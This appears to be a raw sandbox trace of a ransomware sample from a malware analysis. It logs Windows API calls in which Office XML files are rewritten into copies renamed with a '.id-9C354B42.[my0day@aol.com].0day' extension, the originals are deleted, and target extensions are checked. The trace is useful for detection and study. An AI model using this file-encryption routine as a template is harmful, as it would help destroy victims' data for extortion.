(lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 0x20 [0040.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0040.195] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.195] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0040.196] GetLastError () returned 0x0 [0040.196] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x5b2, lpOverlapped=0x0) returned 1 [0040.201] WriteFile (in: hFile=0x1f4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0040.202] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.202] WriteFile (in: hFile=0x1f4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.202] SetEndOfFile (hFile=0x1f4) returned 1 [0040.202] CloseHandle (hObject=0x1f4) returned 1 [0040.203] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.203] SetEndOfFile (hFile=0x170) returned 1 [0040.204] CloseHandle (hObject=0x170) returned 1 [0040.204] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.204] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 1 [0040.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.204] lstrlenW (lpString=".doc") returned 4 [0040.205] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.205] lstrlenW (lpString=".docx") returned 5 [0040.205] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.205] lstrlenW (lpString=".pdf") returned 4 [0040.205] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.205] lstrlenW (lpString=".xls") returned 4 [0040.205] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.205] lstrlenW (lpString=".xlsx") returned 5 [0040.205] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.205] lstrlenW (lpString=".ppt") returned 4 [0040.205] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.205] lstrlenW (lpString=".zip") returned 4 [0040.205] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.205] lstrlenW (lpString=".rar") returned 4 [0040.205] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.205] lstrlenW (lpString=".bz2") returned 4 [0040.205] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.205] lstrlenW (lpString=".7z") returned 3 [0040.205] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.205] lstrlenW (lpString=".dbf") returned 4 [0040.205] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.205] lstrlenW (lpString=".1cd") returned 4 [0040.205] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.205] lstrlenW (lpString=".jpg") returned 4 [0040.205] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.205] lstrlenW (lpString=".doc") returned 4 [0040.205] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.205] lstrlenW (lpString=".docx") returned 5 [0040.205] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.206] lstrlenW (lpString=".pdf") returned 4 [0040.206] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.206] lstrlenW (lpString=".xls") returned 4 [0040.206] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.206] lstrlenW (lpString=".xlsx") returned 5 [0040.206] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.206] lstrlenW (lpString=".ppt") returned 4 [0040.206] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.206] lstrlenW (lpString=".zip") returned 4 [0040.206] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.206] lstrlenW (lpString=".rar") returned 4 [0040.206] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.206] lstrlenW (lpString=".bz2") returned 4 [0040.206] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.206] lstrlenW (lpString=".7z") returned 3 [0040.206] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.206] lstrlenW (lpString=".dbf") returned 4 [0040.206] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.206] lstrlenW (lpString=".1cd") returned 4 [0040.206] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.206] lstrlenW (lpString=".jpg") returned 4 [0040.206] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.206] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.206] lstrlenW (lpString="Proofing.XML") returned 12 [0040.206] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.218] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=811) returned 1 [0040.218] CloseHandle (hObject=0x204) returned 1 [0040.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 0x20 [0040.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.218] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.218] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.219] GetLastError () returned 0x0 [0040.219] ReadFile (in: hFile=0x204, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x32b, lpOverlapped=0x0) returned 1 [0040.220] WriteFile (in: hFile=0x208, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x330, lpOverlapped=0x0) returned 1 [0040.221] ReadFile (in: hFile=0x204, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.221] WriteFile (in: hFile=0x208, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.221] SetEndOfFile (hFile=0x208) returned 1 [0040.221] CloseHandle (hObject=0x208) returned 1 [0040.222] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.222] SetEndOfFile (hFile=0x204) returned 1 [0040.222] CloseHandle (hObject=0x204) returned 1 [0040.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.223] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 1 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.223] lstrlenW (lpString=".doc") returned 4 [0040.223] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString=".docx") returned 5 [0040.223] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1 [0040.223] lstrlenW (lpString=".pdf") returned 4 [0040.223] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString=".xls") returned 4 [0040.223] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString=".xlsx") returned 5 [0040.223] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1 [0040.223] lstrlenW (lpString=".ppt") returned 4 [0040.223] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.223] lstrlenW (lpString=".zip") returned 4 [0040.223] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.223] lstrlenW (lpString=".rar") returned 4 [0040.223] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString=".bz2") returned 4 [0040.224] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".7z") returned 3 [0040.224] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.224] lstrlenW (lpString=".dbf") returned 4 [0040.224] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.224] lstrlenW (lpString=".1cd") returned 4 [0040.224] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.224] lstrlenW (lpString=".jpg") returned 4 [0040.224] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.224] lstrlenW (lpString=".doc") returned 4 [0040.224] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".docx") returned 5 [0040.224] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1 [0040.224] lstrlenW (lpString=".pdf") returned 4 [0040.224] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".xls") returned 4 [0040.224] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".xlsx") returned 5 [0040.224] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1 [0040.224] lstrlenW (lpString=".ppt") returned 4 [0040.224] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.224] lstrlenW (lpString=".zip") returned 4 [0040.224] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.224] lstrlenW (lpString=".rar") returned 4 [0040.224] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".bz2") returned 4 [0040.224] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".7z") returned 3 [0040.225] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.225] lstrlenW (lpString=".dbf") returned 4 [0040.225] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.225] lstrlenW (lpString=".1cd") returned 4 [0040.225] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.225] lstrlenW (lpString=".jpg") returned 4 [0040.225] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.225] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.225] lstrlenW (lpString="ProPlusrWW.XML") returned 14 [0040.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.226] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=16852) returned 1 [0040.226] CloseHandle (hObject=0x204) returned 1 [0040.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 0x20 [0040.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.226] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.226] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.227] GetLastError () returned 0x0 [0040.227] ReadFile (in: hFile=0x204, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x41d4, lpOverlapped=0x0) returned 1 [0040.228] WriteFile (in: hFile=0x208, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x41e0, lpOverlapped=0x0) returned 1 [0040.230] ReadFile (in: hFile=0x204, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.230] WriteFile (in: hFile=0x208, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.230] SetEndOfFile (hFile=0x208) returned 1 [0040.230] CloseHandle (hObject=0x208) returned 1 [0040.231] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.231] SetEndOfFile (hFile=0x204) returned 1 [0040.232] CloseHandle (hObject=0x204) returned 1 [0040.232] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.232] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 1 [0040.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.232] lstrlenW (lpString=".doc") returned 4 [0040.232] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString=".docx") returned 5 [0040.232] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.232] lstrlenW (lpString=".pdf") returned 4 [0040.232] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString=".xls") returned 4 [0040.232] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString=".xlsx") returned 5 [0040.232] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.232] lstrlenW (lpString=".ppt") returned 4 [0040.232] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.232] lstrlenW (lpString=".zip") returned 4 [0040.233] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.233] lstrlenW (lpString=".rar") returned 4 [0040.233] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString=".bz2") returned 4 [0040.233] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString=".7z") returned 3 [0040.233] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.233] lstrlenW (lpString=".dbf") returned 4 [0040.233] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.233] lstrlenW (lpString=".1cd") returned 4 [0040.233] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.233] lstrlenW (lpString=".jpg") returned 4 [0040.233] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.233] lstrlenW (lpString=".doc") returned 4 [0040.233] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString=".docx") returned 5 [0040.233] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.233] lstrlenW (lpString=".pdf") returned 4 [0040.233] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString=".xls") returned 4 [0040.233] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString=".xlsx") returned 5 [0040.233] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.233] lstrlenW (lpString=".ppt") returned 4 [0040.233] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.233] lstrlenW (lpString=".zip") returned 4 [0040.233] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.233] lstrlenW (lpString=".rar") returned 4 [0040.234] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.234] lstrlenW (lpString=".bz2") returned 4 [0040.234] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.234] lstrlenW (lpString=".7z") returned 3 [0040.234] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.234] lstrlenW (lpString=".dbf") returned 4 [0040.234] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 